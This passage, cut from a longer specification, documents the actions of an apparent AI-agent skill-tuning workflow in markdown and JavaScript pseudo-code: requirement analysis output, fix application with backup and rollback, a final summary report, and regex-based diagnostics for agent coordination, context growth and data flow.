description: getCategoryDescription(interp)
})),
multiSelect: false
};
});
return await AskUserQuestion({ questions });
}
function getCategoryLabel(category) {
// Load the label from the mappings configuration
return mappings.category_labels_chinese[category] || category;
}
function getCategoryDescription(category) {
// Load the description from the mappings configuration
return mappings.category_descriptions[category] || 'Requires further analysis';
}
```
## Output
### State Updates
```javascript
return {
stateUpdates: {
requirement_analysis: {
status: ambiguities.some(a => a.needs_clarification) ? 'needs_clarification' : 'completed',
analyzed_at: new Date().toISOString(),
dimensions: dimensions,
spec_matches: specMatches,
coverage: coverageResult,
ambiguities: ambiguities
},
// Automatically refine focus_areas from the analysis results
focus_areas: deriveOptimalFocusAreas(specMatches)
},
outputFiles: [
`${workDir}/requirement-analysis.json`,
`${workDir}/requirement-analysis.md`
],
summary: generateSummary(dimensions, coverageResult, ambiguities)
};
function deriveOptimalFocusAreas(specMatches) {
const coreCategories = ['context', 'memory', 'dataflow', 'agent'];
const matched = specMatches
.filter(m => m.taxonomy_match !== null)
.map(m => {
// Map the category to a diagnosis focus_area
const category = m.taxonomy_match.category;
if (category === 'context_explosion' || category === 'performance') return 'context';
if (category === 'memory_loss') return 'memory';
if (category === 'dataflow_break') return 'dataflow';
if (category === 'agent_failure' || category === 'error_handling') return 'agent';
return null;
})
.filter(f => f && coreCategories.includes(f));
// Deduplicate
return [...new Set(matched)];
}
function generateSummary(dimensions, coverage, ambiguities) {
const dimCount = dimensions.length;
const coverageStatus = coverage.status;
const ambiguityCount = ambiguities.filter(a => a.needs_clarification).length;
let summary = `Analysis complete: ${dimCount} dimensions`;
summary += `, coverage ${coverage.coverage_rate}% (${coverageStatus})`;
if (ambiguityCount > 0) {
summary += `, ${ambiguityCount} ambiguities awaiting clarification`;
}
return summary;
}
```
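The category → focus-area mapping inside `deriveOptimalFocusAreas` can be checked in isolation (restated here without workflow APIs):

```javascript
// Restated category → focus-area mapping, with deduplication.
function deriveOptimalFocusAreas(specMatches) {
  const map = {
    context_explosion: 'context', performance: 'context',
    memory_loss: 'memory', dataflow_break: 'dataflow',
    agent_failure: 'agent', error_handling: 'agent'
  };
  const focus = specMatches
    .filter(m => m.taxonomy_match !== null)
    .map(m => map[m.taxonomy_match.category])
    .filter(Boolean);
  return [...new Set(focus)]; // deduplicate
}

console.log(deriveOptimalFocusAreas([
  { taxonomy_match: { category: 'context_explosion' } },
  { taxonomy_match: { category: 'performance' } }, // also maps to 'context'
  { taxonomy_match: { category: 'agent_failure' } },
  { taxonomy_match: null }
])); // [ 'context', 'agent' ]
```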
### Output Files
#### requirement-analysis.json
```json
{
"timestamp": "2024-01-01T00:00:00Z",
"target_skill": "skill-name",
"user_description": "the original user description",
"dimensions": [...],
"spec_matches": [...],
"coverage": {...},
"ambiguities": [...],
"derived_focus_areas": [...]
}
```
#### requirement-analysis.md
```markdown
# Requirement Analysis Report
## User Description
> ${user_issue_description}
## Dimension Decomposition
| ID | Description | Category | Confidence |
|----|-------------|----------|------------|
| DIM-001 | ... | ... | 0.85 |
## Spec Matching
| Dimension | Detection Patterns | Fix Strategy | Satisfied |
|-----------|--------------------|--------------|-----------|
| DIM-001 | CTX-001,002 | sliding_window | ✓ |
## Coverage Evaluation
- Total dimensions: N
- With detection patterns: M
- With fix strategy: K (the satisfaction criterion)
- Coverage rate: X%
- Status: satisfied/partial/unsatisfied
## Ambiguities
(if any)
```
## Error Handling
| Error | Recovery |
|-------|----------|
| Gemini CLI timeout | Retry once; if it still fails, fall back to a simplified analysis |
| JSON parse failure | Attempt to repair the JSON or fall back to default dimensions |
| No category matched | Classify all dimensions as custom and trigger deep Gemini analysis |
## Next Actions
- If `requirement_analysis.status === 'completed'`: proceed to `action-diagnose-*`
- If `requirement_analysis.status === 'needs_clarification'`: wait for user clarification, then re-run
- If `coverage.status === 'unsatisfied'`: automatically trigger `action-gemini-analysis` for deep analysis

# Action: Apply Fix
Apply a selected fix to the target skill with backup and rollback capability.
## Purpose
- Apply fix changes to target skill files
- Create backup before modifications
- Track applied fixes for verification
- Support rollback if needed
## Preconditions
- [ ] state.status === 'running'
- [ ] state.pending_fixes.length > 0
- [ ] state.proposed_fixes contains the fix to apply
## Execution
```javascript
async function execute(state, workDir) {
const pendingFixes = state.pending_fixes;
const proposedFixes = state.proposed_fixes;
const targetPath = state.target_skill.path;
const backupDir = state.backup_dir;
if (pendingFixes.length === 0) {
return {
stateUpdates: {},
outputFiles: [],
summary: 'No pending fixes to apply'
};
}
// Get next fix to apply
const fixId = pendingFixes[0];
const fix = proposedFixes.find(f => f.id === fixId);
if (!fix) {
return {
stateUpdates: {
pending_fixes: pendingFixes.slice(1),
errors: [...state.errors, {
action: 'action-apply-fix',
message: `Fix ${fixId} not found in proposals`,
timestamp: new Date().toISOString(),
recoverable: true
}]
},
outputFiles: [],
summary: `Fix ${fixId} not found, skipping`
};
}
console.log(`Applying fix ${fix.id}: ${fix.description}`);
// Create fix-specific backup
const fixBackupDir = `${backupDir}/before-${fix.id}`;
Bash(`mkdir -p "${fixBackupDir}"`);
const appliedChanges = [];
let success = true;
for (const change of fix.changes) {
try {
// Resolve file path (handle wildcards)
let targetFiles = [];
if (change.file.includes('*')) {
targetFiles = Glob(`${targetPath}/${change.file}`);
} else {
targetFiles = [`${targetPath}/${change.file}`];
}
for (const targetFile of targetFiles) {
// Backup original
const relativePath = targetFile.replace(targetPath + '/', '');
const backupPath = `${fixBackupDir}/${relativePath}`;
if (Glob(targetFile).length > 0) {
const originalContent = Read(targetFile);
Bash(`mkdir -p "$(dirname "${backupPath}")"`);
Write(backupPath, originalContent);
}
// Apply change based on action type
if (change.action === 'modify' && change.diff) {
// For now, append the diff as a comment/note
// Real implementation would parse and apply the diff
const existingContent = Read(targetFile);
// Simple diff application: look for context and apply
// This is a simplified version - real implementation would be more sophisticated
const newContent = existingContent + `\n\n<!-- Applied fix ${fix.id}: ${fix.description} -->\n`;
Write(targetFile, newContent);
appliedChanges.push({
file: relativePath,
action: 'modified',
backup: backupPath
});
} else if (change.action === 'create') {
Write(targetFile, change.new_content || '');
appliedChanges.push({
file: relativePath,
action: 'created',
backup: null
});
}
}
} catch (error) {
console.log(`Error applying change to ${change.file}: ${error.message}`);
success = false;
}
}
// Record applied fix
const appliedFix = {
fix_id: fix.id,
applied_at: new Date().toISOString(),
success: success,
backup_path: fixBackupDir,
verification_result: 'pending',
rollback_available: true,
changes_made: appliedChanges
};
// Update applied fixes log
const appliedFixesPath = `${workDir}/fixes/applied-fixes.json`;
let existingApplied = [];
try {
existingApplied = JSON.parse(Read(appliedFixesPath));
} catch (e) {
existingApplied = [];
}
existingApplied.push(appliedFix);
Write(appliedFixesPath, JSON.stringify(existingApplied, null, 2));
return {
stateUpdates: {
applied_fixes: [...state.applied_fixes, appliedFix],
pending_fixes: pendingFixes.slice(1) // Remove applied fix from pending
},
outputFiles: [appliedFixesPath],
summary: `Applied fix ${fix.id}: ${success ? 'success' : 'partial'}, ${appliedChanges.length} files modified`
};
}
```
## State Updates
```javascript
return {
stateUpdates: {
applied_fixes: [...existingApplied, newAppliedFix],
pending_fixes: remainingPendingFixes
}
};
```
## Rollback Function
```javascript
async function rollbackFix(fixId, state, workDir) {
const appliedFix = state.applied_fixes.find(f => f.fix_id === fixId);
if (!appliedFix || !appliedFix.rollback_available) {
throw new Error(`Cannot rollback fix ${fixId}`);
}
const backupDir = appliedFix.backup_path;
const targetPath = state.target_skill.path;
// Restore from backup
const backupFiles = Glob(`${backupDir}/**/*`);
for (const backupFile of backupFiles) {
const relativePath = backupFile.replace(backupDir + '/', '');
const targetFile = `${targetPath}/${relativePath}`;
const content = Read(backupFile);
Write(targetFile, content);
}
return {
stateUpdates: {
applied_fixes: state.applied_fixes.map(f =>
f.fix_id === fixId
? { ...f, rollback_available: false, verification_result: 'rolled_back' }
: f
)
}
};
}
```
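The backup-to-target path mapping used by the rollback loop is a plain prefix swap; a standalone sketch (paths illustrative):

```javascript
// Map a file inside a fix backup back to its location in the target skill.
function restoreTarget(backupFile, backupDir, targetPath) {
  const relativePath = backupFile.replace(backupDir + '/', '');
  return `${targetPath}/${relativePath}`;
}

console.log(restoreTarget(
  '.workflow/.scratchpad/s1/backups/before-FIX-001/phases/orchestrator.md',
  '.workflow/.scratchpad/s1/backups/before-FIX-001',
  'skills/my-skill'
)); // skills/my-skill/phases/orchestrator.md
```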
## Error Handling
| Error Type | Recovery |
|------------|----------|
| File not found | Skip file, log warning |
| Write permission error | Retry with sudo or report |
| Backup creation failed | Abort fix, don't modify |
## Next Actions
- If pending_fixes.length > 0: action-apply-fix (continue)
- If all fixes applied: action-verify

# Action: Complete
Finalize the tuning session with summary report and cleanup.
## Purpose
- Generate final summary report
- Record tuning statistics
- Clean up temporary files (optional)
- Provide recommendations for future maintenance
## Preconditions
- [ ] state.status === 'running'
- [ ] quality_gate === 'pass' OR max_iterations reached
## Execution
```javascript
async function execute(state, workDir) {
console.log('Finalizing skill tuning session...');
const targetSkill = state.target_skill;
const startTime = new Date(state.started_at);
const endTime = new Date();
const duration = Math.round((endTime - startTime) / 1000);
// Generate final summary
const summary = `# Skill Tuning Summary
**Target Skill**: ${targetSkill.name}
**Path**: ${targetSkill.path}
**Session Duration**: ${duration} seconds
**Completed**: ${endTime.toISOString()}
---
## Final Status
| Metric | Value |
|--------|-------|
| Final Health Score | ${state.quality_score}/100 |
| Quality Gate | ${state.quality_gate.toUpperCase()} |
| Total Iterations | ${state.iteration_count} |
| Issues Found | ${state.issues.length + state.applied_fixes.flatMap(f => f.issues_resolved || []).length} |
| Issues Resolved | ${state.applied_fixes.flatMap(f => f.issues_resolved || []).length} |
| Fixes Applied | ${state.applied_fixes.length} |
| Fixes Verified | ${state.applied_fixes.filter(f => f.verification_result === 'pass').length} |
---
## Diagnosis Summary
| Area | Issues Found | Severity |
|------|--------------|----------|
| Context Explosion | ${state.diagnosis.context?.issues_found || 'N/A'} | ${state.diagnosis.context?.severity || 'N/A'} |
| Long-tail Forgetting | ${state.diagnosis.memory?.issues_found || 'N/A'} | ${state.diagnosis.memory?.severity || 'N/A'} |
| Data Flow | ${state.diagnosis.dataflow?.issues_found || 'N/A'} | ${state.diagnosis.dataflow?.severity || 'N/A'} |
| Agent Coordination | ${state.diagnosis.agent?.issues_found || 'N/A'} | ${state.diagnosis.agent?.severity || 'N/A'} |
---
## Applied Fixes
${state.applied_fixes.length === 0 ? '_No fixes applied_' :
state.applied_fixes.map((fix, i) => `
### ${i + 1}. ${fix.fix_id}
- **Applied At**: ${fix.applied_at}
- **Success**: ${fix.success ? 'Yes' : 'No'}
- **Verification**: ${fix.verification_result}
- **Rollback Available**: ${fix.rollback_available ? 'Yes' : 'No'}
`).join('\n')}
---
## Remaining Issues
${state.issues.length === 0 ? '✅ All issues resolved!' :
`${state.issues.length} issues remain:\n\n` +
state.issues.map(issue =>
`- **[${issue.severity.toUpperCase()}]** ${issue.description} (${issue.id})`
).join('\n')}
---
## Recommendations
${generateRecommendations(state)}
---
## Backup Information
Original skill files backed up to:
\`${state.backup_dir}\`
To restore original skill:
\`\`\`bash
cp -r "${state.backup_dir}/${targetSkill.name}-backup"/* "${targetSkill.path}/"
\`\`\`
---
## Session Files
| File | Description |
|------|-------------|
| ${workDir}/tuning-report.md | Full diagnostic report |
| ${workDir}/diagnosis/*.json | Individual diagnosis results |
| ${workDir}/fixes/fix-proposals.json | Proposed fixes |
| ${workDir}/fixes/applied-fixes.json | Applied fix history |
| ${workDir}/tuning-summary.md | This summary |
---
*Skill tuning completed by skill-tuning*
`;
Write(`${workDir}/tuning-summary.md`, summary);
// Update final state
return {
stateUpdates: {
status: 'completed',
completed_at: endTime.toISOString()
},
outputFiles: [`${workDir}/tuning-summary.md`],
summary: `Tuning complete: ${state.quality_gate} with ${state.quality_score}/100 health score`
};
}
function generateRecommendations(state) {
const recommendations = [];
// Based on remaining issues
if (state.issues.some(i => i.type === 'context_explosion')) {
recommendations.push('- **Context Management**: Consider implementing a context summarization agent to prevent token growth');
}
if (state.issues.some(i => i.type === 'memory_loss')) {
recommendations.push('- **Constraint Tracking**: Add explicit constraint injection to each phase prompt');
}
if (state.issues.some(i => i.type === 'dataflow_break')) {
recommendations.push('- **State Centralization**: Migrate to single state.json with schema validation');
}
if (state.issues.some(i => i.type === 'agent_failure')) {
recommendations.push('- **Error Handling**: Wrap all Task calls in try-catch blocks');
}
// General recommendations
if (state.iteration_count >= state.max_iterations) {
recommendations.push('- **Deep Refactoring**: Consider architectural review if issues persist after multiple iterations');
}
if (state.quality_score < 80) {
recommendations.push('- **Regular Tuning**: Schedule periodic skill-tuning runs to catch issues early');
}
if (recommendations.length === 0) {
recommendations.push('- Skill is in good health! Monitor for regressions during future development.');
}
return recommendations.join('\n');
}
```
## State Updates
```javascript
return {
stateUpdates: {
status: 'completed',
completed_at: '<timestamp>'
}
};
```
## Output
- **File**: `tuning-summary.md`
- **Location**: `${workDir}/tuning-summary.md`
- **Format**: Markdown
## Error Handling
| Error Type | Recovery |
|------------|----------|
| Summary write failed | Write to alternative location |
## Next Actions
- None (terminal state)

# Action: Diagnose Agent Coordination
Analyze target skill for agent coordination failures - call chain fragility and result passing issues.
## Purpose
- Detect fragile agent call patterns
- Identify result passing issues
- Find missing error handling in agent calls
- Analyze agent return format consistency
## Preconditions
- [ ] state.status === 'running'
- [ ] state.target_skill.path is set
- [ ] 'agent' in state.focus_areas OR state.focus_areas is empty
## Detection Patterns
### Pattern 1: Unhandled Agent Failures
```regex
# Task calls without try-catch or error handling
/Task\s*\(\s*\{[^}]*\}\s*\)(?![^;]*catch)/
```
### Pattern 2: Missing Return Validation
```regex
# Agent result used directly without validation
/const\s+\w+\s*=\s*(?:await\s+)?Task\([^)]+\);\s*(?!.*(?:if|try|JSON\.parse))/
```
### Pattern 3: Inconsistent Agent Configuration
```regex
# Different agent configurations in same skill
/subagent_type:\s*['"]([^'"]+)['"]/g
```
### Pattern 4: Deeply Nested Agent Calls
```regex
# Agent calling another agent (nested)
/Task\s*\([^)]*prompt:[^)]*Task\s*\(/
```
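The subagent_type extraction can be exercised with `matchAll`; this sketch uses the `[^'"]+` character class so hyphenated agent types match (sample text illustrative):

```javascript
// Collect the distinct subagent_type values referenced in a document chunk.
const sample = `
Task({ subagent_type: "general-purpose", prompt: "..." })
Task({ subagent_type: 'code-reviewer', prompt: "..." })
Task({ subagent_type: "general-purpose", prompt: "..." })
`;

const types = new Set(
  [...sample.matchAll(/subagent_type:\s*['"]([^'"]+)['"]/g)].map(m => m[1])
);
console.log([...types]); // [ 'general-purpose', 'code-reviewer' ]
```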
## Execution
```javascript
async function execute(state, workDir) {
const skillPath = state.target_skill.path;
const startTime = Date.now();
const issues = [];
const evidence = [];
console.log(`Diagnosing agent coordination in ${skillPath}...`);
// 1. Find all Task/agent calls
const allFiles = Glob(`${skillPath}/**/*.md`);
const agentCalls = [];
const agentTypes = new Set();
for (const file of allFiles) {
const content = Read(file);
const relativePath = file.replace(skillPath + '/', '');
// Find Task calls
const taskMatches = content.matchAll(/Task\s*\(\s*\{([^}]+)\}/g);
for (const match of taskMatches) {
const config = match[1];
// Extract agent type
const typeMatch = config.match(/subagent_type:\s*['"]([^'"]+)['"]/);
const agentType = typeMatch ? typeMatch[1] : 'unknown';
agentTypes.add(agentType);
// Check for error handling context
const hasErrorHandling = /try\s*\{.*Task|\.catch\(|await\s+Task.*\.then/s.test(
content.slice(Math.max(0, match.index - 100), match.index + match[0].length + 100)
);
// Check for result validation
const hasResultValidation = /JSON\.parse|if\s*\(\s*result|result\s*\?\./s.test(
content.slice(match.index, match.index + match[0].length + 200)
);
// Check for background execution
const runsInBackground = /run_in_background:\s*true/.test(config);
agentCalls.push({
file: relativePath,
agentType,
hasErrorHandling,
hasResultValidation,
runsInBackground,
config: config.slice(0, 200)
});
}
}
// 2. Analyze agent call patterns
const totalCalls = agentCalls.length;
const callsWithoutErrorHandling = agentCalls.filter(c => !c.hasErrorHandling);
const callsWithoutValidation = agentCalls.filter(c => !c.hasResultValidation);
// Issue: Missing error handling
if (callsWithoutErrorHandling.length > 0) {
issues.push({
id: `AGT-${issues.length + 1}`,
type: 'agent_failure',
severity: callsWithoutErrorHandling.length > 2 ? 'high' : 'medium',
location: { file: 'multiple' },
description: `${callsWithoutErrorHandling.length}/${totalCalls} agent calls lack error handling`,
evidence: callsWithoutErrorHandling.slice(0, 3).map(c =>
`${c.file}: ${c.agentType}`
),
root_cause: 'Agent failures not caught, may crash workflow',
impact: 'Unhandled agent errors cause cascading failures',
suggested_fix: 'Wrap Task calls in try-catch with graceful fallback'
});
evidence.push({
file: 'multiple',
pattern: 'missing_error_handling',
context: `${callsWithoutErrorHandling.length} calls affected`,
severity: 'high'
});
}
// Issue: Missing result validation
if (callsWithoutValidation.length > 0) {
issues.push({
id: `AGT-${issues.length + 1}`,
type: 'agent_failure',
severity: 'medium',
location: { file: 'multiple' },
description: `${callsWithoutValidation.length}/${totalCalls} agent calls lack result validation`,
evidence: callsWithoutValidation.slice(0, 3).map(c =>
`${c.file}: ${c.agentType} result not validated`
),
root_cause: 'Agent results used directly without type checking',
impact: 'Invalid agent output may corrupt state',
suggested_fix: 'Add JSON.parse with try-catch and schema validation'
});
}
// 3. Check for inconsistent agent types usage
if (agentTypes.size > 3 && state.target_skill.execution_mode === 'autonomous') {
issues.push({
id: `AGT-${issues.length + 1}`,
type: 'agent_failure',
severity: 'low',
location: { file: 'multiple' },
description: `Using ${agentTypes.size} different agent types`,
evidence: [...agentTypes].slice(0, 5),
root_cause: 'Multiple agent types increase coordination complexity',
impact: 'Different agent behaviors may cause inconsistency',
suggested_fix: 'Standardize on fewer agent types with clear roles'
});
}
// 4. Check for nested agent calls
for (const file of allFiles) {
const content = Read(file);
const relativePath = file.replace(skillPath + '/', '');
// Detect nested Task calls
const hasNestedTask = /Task\s*\([^)]*prompt:[^)]*Task\s*\(/s.test(content);
if (hasNestedTask) {
issues.push({
id: `AGT-${issues.length + 1}`,
type: 'agent_failure',
severity: 'high',
location: { file: relativePath },
description: 'Nested agent calls detected',
evidence: ['Agent prompt contains another Task call'],
root_cause: 'Agent calls another agent, creating deep nesting',
impact: 'Context explosion, hard to debug, unpredictable behavior',
suggested_fix: 'Flatten agent calls, use orchestrator to coordinate'
});
}
}
// 5. Check SKILL.md for agent configuration consistency
const skillMd = Read(`${skillPath}/SKILL.md`);
// Check if allowed-tools includes Task
const allowedTools = skillMd.match(/allowed-tools:\s*([^\n]+)/i);
if (allowedTools && !allowedTools[1].includes('Task') && totalCalls > 0) {
issues.push({
id: `AGT-${issues.length + 1}`,
type: 'agent_failure',
severity: 'medium',
location: { file: 'SKILL.md' },
description: 'Task tool used but not declared in allowed-tools',
evidence: [`${totalCalls} Task calls found, but Task not in allowed-tools`],
root_cause: 'Tool declaration mismatch',
impact: 'May cause runtime permission issues',
suggested_fix: 'Add Task to allowed-tools in SKILL.md front matter'
});
}
// 6. Check for agent result format consistency
const returnFormats = new Set();
for (const file of allFiles) {
const content = Read(file);
// Look for return format definitions
const returnMatch = content.match(/\[RETURN\][^[]*|return\s*\{[^}]+\}/gi);
if (returnMatch) {
returnMatch.forEach(r => {
const format = r.includes('JSON') ? 'json' :
r.includes('summary') ? 'summary' :
r.includes('file') ? 'file_path' : 'other';
returnFormats.add(format);
});
}
}
if (returnFormats.size > 2) {
issues.push({
id: `AGT-${issues.length + 1}`,
type: 'agent_failure',
severity: 'medium',
location: { file: 'multiple' },
description: 'Inconsistent agent return formats',
evidence: [...returnFormats],
root_cause: 'Different agents return data in different formats',
impact: 'Orchestrator must handle multiple format types',
suggested_fix: 'Standardize return format: {status, output_file, summary}'
});
}
// 7. Calculate severity
const criticalCount = issues.filter(i => i.severity === 'critical').length;
const highCount = issues.filter(i => i.severity === 'high').length;
const severity = criticalCount > 0 ? 'critical' :
highCount > 1 ? 'high' :
highCount > 0 ? 'medium' :
issues.length > 0 ? 'low' : 'none';
// 8. Write diagnosis result
const diagnosisResult = {
status: 'completed',
issues_found: issues.length,
severity: severity,
execution_time_ms: Date.now() - startTime,
details: {
patterns_checked: [
'error_handling',
'result_validation',
'agent_type_consistency',
'nested_calls',
'return_format_consistency'
],
patterns_matched: evidence.map(e => e.pattern),
evidence: evidence,
agent_analysis: {
total_agent_calls: totalCalls,
unique_agent_types: agentTypes.size,
calls_without_error_handling: callsWithoutErrorHandling.length,
calls_without_validation: callsWithoutValidation.length,
agent_types_used: [...agentTypes]
},
recommendations: [
callsWithoutErrorHandling.length > 0
? 'Add try-catch to all Task calls' : null,
callsWithoutValidation.length > 0
? 'Add result validation with JSON.parse and schema check' : null,
agentTypes.size > 3
? 'Consolidate agent types for consistency' : null
].filter(Boolean)
}
};
Write(`${workDir}/diagnosis/agent-diagnosis.json`,
JSON.stringify(diagnosisResult, null, 2));
return {
stateUpdates: {
'diagnosis.agent': diagnosisResult,
issues: [...state.issues, ...issues]
},
outputFiles: [`${workDir}/diagnosis/agent-diagnosis.json`],
summary: `Agent diagnosis: ${issues.length} issues found (severity: ${severity})`
};
}
```
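The suggested fixes above (try-catch around `Task` calls, result validation before use) can be sketched together as a small wrapper. This is a minimal sketch: `Task` is the pseudo-API used throughout this skill, and the helper name `callAgentSafely` and the expected `{status, output_file, summary}` shape are illustrative assumptions, not part of the skill's defined API.

```javascript
// Sketch of the suggested fix: wrap Task calls with error handling and
// result validation. `Task` is this skill's pseudo-API; the helper name
// and fallback convention here are illustrative assumptions.
async function callAgentSafely(config, fallback = null) {
  try {
    const raw = await Task(config);
    // Validate before use: agents are expected to return
    // {status, output_file, summary} rather than raw content
    const result = typeof raw === 'string' ? JSON.parse(raw) : raw;
    if (!result || result.status !== 'completed' || !result.output_file) {
      console.warn(`Agent ${config.subagent_type} returned unexpected shape`);
      return fallback;
    }
    return result;
  } catch (err) {
    // Graceful fallback instead of crashing the workflow
    console.warn(`Agent ${config.subagent_type} failed: ${err.message}`);
    return fallback;
  }
}
```

An orchestrator can then treat a `null` (or caller-supplied fallback) return as "this agent's output is unavailable" and degrade gracefully instead of propagating an exception.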
## State Updates
```javascript
return {
stateUpdates: {
'diagnosis.agent': {
status: 'completed',
issues_found: <count>,
severity: '<critical|high|medium|low|none>',
// ... full diagnosis result
},
issues: [...existingIssues, ...newIssues]
}
};
```
## Error Handling
| Error Type | Recovery |
|------------|----------|
| Regex match error | Use simpler patterns |
| File access error | Skip and continue |
## Next Actions
- Success: action-generate-report
- Skipped: If 'agent' not in focus_areas

# Action: Diagnose Context Explosion
Analyze target skill for context explosion issues - token accumulation and multi-turn dialogue bloat.
## Purpose
- Detect patterns that cause context growth
- Identify multi-turn accumulation points
- Find missing context compression mechanisms
- Measure potential token waste
## Preconditions
- [ ] state.status === 'running'
- [ ] state.target_skill.path is set
- [ ] 'context' in state.focus_areas OR state.focus_areas is empty
## Detection Patterns
### Pattern 1: Unbounded History Accumulation
```regex
# Patterns that suggest history accumulation
/\bhistory\b.*\.push\b/
/\bmessages\b.*\.concat\b/
/\bconversation\b.*\+=\b/
/\bappend.*context\b/i
```
### Pattern 2: Full Content Passing
```regex
# Patterns that pass full content instead of references
/Read\([^)]+\).*\+.*Read\(/
/JSON\.stringify\(.*state\)/ # Full state serialization
/\$\{.*content\}/ # Template literal with full content
```
### Pattern 3: Missing Summarization
```regex
# Absence of compression/summarization
# Check for lack of: summarize, compress, truncate, slice
```
### Pattern 4: Agent Return Bloat
```regex
# Agent returning full content instead of path + summary
/return\s*\{[^}]*content:/
/return.*JSON\.stringify/
```
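The fix this pattern points to, returning a file path plus a short summary instead of full content, can be sketched as follows. `Write` is the pseudo-API used throughout this skill; the 200-character summary cap and the helper name are illustrative assumptions.

```javascript
// Sketch of the path+summary return pattern suggested by this diagnostic:
// persist full content to disk, hand back only a reference and a preview.
// `Write` is this skill's pseudo-API; the cap of 200 chars is an assumption.
function returnResult(workDir, name, content) {
  const outputFile = `${workDir}/${name}.json`;
  Write(outputFile, JSON.stringify(content, null, 2));
  return {
    status: 'completed',
    output_file: outputFile,                         // reference, not content
    summary: JSON.stringify(content).slice(0, 200)   // short preview only
  };
}
```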
## Execution
```javascript
async function execute(state, workDir) {
const skillPath = state.target_skill.path;
const startTime = Date.now();
const issues = [];
const evidence = [];
console.log(`Diagnosing context explosion in ${skillPath}...`);
// 1. Scan all phase files
const phaseFiles = Glob(`${skillPath}/phases/**/*.md`);
for (const file of phaseFiles) {
const content = Read(file);
const relativePath = file.replace(skillPath + '/', '');
// Check Pattern 1: History accumulation
const historyPatterns = [
/history\s*[.=].*(?:push|concat|append)/gi,
/messages\s*=\s*\[.*\.\.\..*messages/gi,
/conversation.*\+=/gi
];
for (const pattern of historyPatterns) {
const matches = content.match(pattern);
if (matches) {
issues.push({
id: `CTX-${issues.length + 1}`,
type: 'context_explosion',
severity: 'high',
location: { file: relativePath },
description: 'Unbounded history accumulation detected',
evidence: matches.slice(0, 3),
root_cause: 'History/messages array grows without bounds',
impact: 'Token count increases linearly with iterations',
suggested_fix: 'Implement sliding window or summarization'
});
evidence.push({
file: relativePath,
pattern: 'history_accumulation',
context: matches[0],
severity: 'high'
});
}
}
// Check Pattern 2: Full content passing
const contentPatterns = [
/Read\s*\([^)]+\)\s*[\+,]/g,
/JSON\.stringify\s*\(\s*state\s*\)/g,
/\$\{[^}]*content[^}]*\}/g
];
for (const pattern of contentPatterns) {
const matches = content.match(pattern);
if (matches) {
issues.push({
id: `CTX-${issues.length + 1}`,
type: 'context_explosion',
severity: 'medium',
location: { file: relativePath },
description: 'Full content passed instead of reference',
evidence: matches.slice(0, 3),
root_cause: 'Entire file/state content included in prompts',
impact: 'Unnecessary token consumption',
suggested_fix: 'Pass file paths and summaries instead of full content'
});
evidence.push({
file: relativePath,
pattern: 'full_content_passing',
context: matches[0],
severity: 'medium'
});
}
}
// Check Pattern 3: Missing summarization
const hasSummarization = /summariz|compress|truncat|slice.*context/i.test(content);
const hasLongPrompts = content.length > 5000;
if (hasLongPrompts && !hasSummarization) {
issues.push({
id: `CTX-${issues.length + 1}`,
type: 'context_explosion',
severity: 'medium',
location: { file: relativePath },
description: 'Long phase file without summarization mechanism',
evidence: [`File length: ${content.length} chars`],
root_cause: 'No context compression for large content',
impact: 'Potential token overflow in long sessions',
suggested_fix: 'Add context summarization before passing to agents'
});
}
// Check Pattern 4: Agent return bloat
const returnPatterns = /return\s*\{[^}]*(?:content|full_output|complete_result):/g;
const returnMatches = content.match(returnPatterns);
if (returnMatches) {
issues.push({
id: `CTX-${issues.length + 1}`,
type: 'context_explosion',
severity: 'high',
location: { file: relativePath },
description: 'Agent returns full content instead of path+summary',
evidence: returnMatches.slice(0, 3),
root_cause: 'Agent output includes complete content',
impact: 'Context bloat when orchestrator receives full output',
suggested_fix: 'Return {output_file, summary} instead of {content}'
});
}
}
// 2. Calculate severity
const criticalCount = issues.filter(i => i.severity === 'critical').length;
const highCount = issues.filter(i => i.severity === 'high').length;
const severity = criticalCount > 0 ? 'critical' :
highCount > 2 ? 'high' :
highCount > 0 ? 'medium' :
issues.length > 0 ? 'low' : 'none';
// 3. Write diagnosis result
const diagnosisResult = {
status: 'completed',
issues_found: issues.length,
severity: severity,
execution_time_ms: Date.now() - startTime,
details: {
patterns_checked: [
'history_accumulation',
'full_content_passing',
'missing_summarization',
'agent_return_bloat'
],
patterns_matched: evidence.map(e => e.pattern),
evidence: evidence,
recommendations: [
issues.length > 0 ? 'Implement context summarization agent' : null,
highCount > 0 ? 'Add sliding window for conversation history' : null,
evidence.some(e => e.pattern === 'full_content_passing')
? 'Refactor to pass file paths instead of content' : null
].filter(Boolean)
}
};
Write(`${workDir}/diagnosis/context-diagnosis.json`,
JSON.stringify(diagnosisResult, null, 2));
return {
stateUpdates: {
'diagnosis.context': diagnosisResult,
issues: [...state.issues, ...issues],
'issues_by_severity.critical': state.issues_by_severity.critical + criticalCount,
'issues_by_severity.high': state.issues_by_severity.high + highCount
},
outputFiles: [`${workDir}/diagnosis/context-diagnosis.json`],
summary: `Context diagnosis: ${issues.length} issues found (severity: ${severity})`
};
}
```
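The "sliding window or summarization" fix suggested by the history-accumulation issue can be sketched as a bounded push helper. This is a minimal sketch: the window size and the bracketed summary marker are illustrative assumptions; a real implementation would call a summarization agent rather than emit a placeholder string.

```javascript
// Sketch of the "sliding window" fix: cap conversation history instead of
// letting it grow unboundedly. Window size and the summary marker format
// are illustrative assumptions.
function pushWithWindow(history, entry, maxEntries = 10) {
  const next = [...history, entry];
  if (next.length <= maxEntries) return next;
  // Collapse the oldest overflow into a single summary marker so early
  // context is compressed rather than silently dropped
  const overflow = next.slice(0, next.length - maxEntries);
  const summary = `[summary of ${overflow.length} earlier entries]`;
  return [summary, ...next.slice(next.length - maxEntries)];
}
```

With this in place, token usage per iteration stays roughly constant instead of growing linearly with the number of turns.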
## State Updates
```javascript
return {
stateUpdates: {
'diagnosis.context': {
status: 'completed',
issues_found: <count>,
severity: '<critical|high|medium|low|none>',
// ... full diagnosis result
},
issues: [...existingIssues, ...newIssues]
}
};
```
## Error Handling
| Error Type | Recovery |
|------------|----------|
| File read error | Skip file, log warning |
| Pattern matching error | Use fallback patterns |
| Write error | Retry to alternative path |
## Next Actions
- Success: action-diagnose-memory (or next in focus_areas)
- Skipped: If 'context' not in focus_areas

# Action: Diagnose Data Flow Issues
Analyze target skill for data flow disruption - state inconsistencies and format variations.
## Purpose
- Detect inconsistent data formats between phases
- Identify scattered state storage
- Find missing data contracts
- Measure state transition integrity
## Preconditions
- [ ] state.status === 'running'
- [ ] state.target_skill.path is set
- [ ] 'dataflow' in state.focus_areas OR state.focus_areas is empty
## Detection Patterns
### Pattern 1: Multiple Storage Locations
```regex
# Data written to multiple paths without centralization
/Write\s*\(\s*[`'"][^`'"]+[`'"]/g
```
